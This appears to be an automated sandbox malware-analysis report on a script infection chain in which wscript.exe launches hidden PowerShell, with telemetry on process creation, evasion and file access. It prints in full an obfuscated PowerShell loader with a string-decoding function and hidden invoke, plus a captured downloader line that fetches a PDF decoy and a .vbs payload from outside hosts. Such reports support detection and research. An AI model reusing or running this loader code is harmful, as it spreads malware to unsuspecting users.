          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2675286463.000001336A183000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32? source: powershell.exe, 00000004.00000002.1399165537.000001D466470000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbL. source: powershell.exe, 00000008.00000002.2678462798.000001336A368000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000004.00000002.1402547814.000001D4667F8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CallSite.Target.pdbe35 source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CC2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbk source: powershell.exe, 00000008.00000002.2678462798.000001336A356000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1401973851.000001D46676B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Core.pdbM source: powershell.exe, 00000008.00000002.2680246932.000001336A3E0000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD7557 pushad ; retf 1_2_00007FFE7DFD755D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD6D77 push esp; retf 1_2_00007FFE7DFD6D78
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD7407 push ds; retf 1_2_00007FFE7DFD740F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7DFD00BD pushad ; iretd 1_2_00007FFE7DFD00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFE7E0A7613 push edi; ret 1_2_00007FFE7E0A7616
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DFE7D57 pushad ; ret 4_2_00007FFE7DFE7D5D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DFE7C07 push ds; ret 4_2_00007FFE7DFE7C0F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFE7DFE00BD pushad ; iretd 4_2_00007FFE7DFE00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC00BD pushad ; iretd 8_2_00007FFE7DFC00C1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7E095535 push ebp; iretd 8_2_00007FFE7E095538

          Boot Survival

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htp13www.fornid.com/wh/List%20of%20rfzgquirfzgd%20itfzgms%20and%20sfzgrvicfzgs.pdf';getit -fz $flol -oulv 'htp13www.pinfzgapplfzgtfzgch.afzg/na/mg.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this mod

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4455
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5324
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6875
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2785
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7420
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2254
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324 Thread sleep time: -11068046444225724s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep count: 6875 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep count: 2785 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356 Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
          Source: powershell.exe, 00000008.00000002.2678462798.000001336A320000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWtt%SystemRoot%\system32\mswsock.dlld Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match; File source: amsi64_7700.amsi.csv, type: OTHER
          Source: Yara match; File source: amsi64_832.amsi.csv, type: OTHER
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR
          Source: Yara match; File source: Process Memory Space: powershell.exe PID: 832, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. 
SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. 
svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
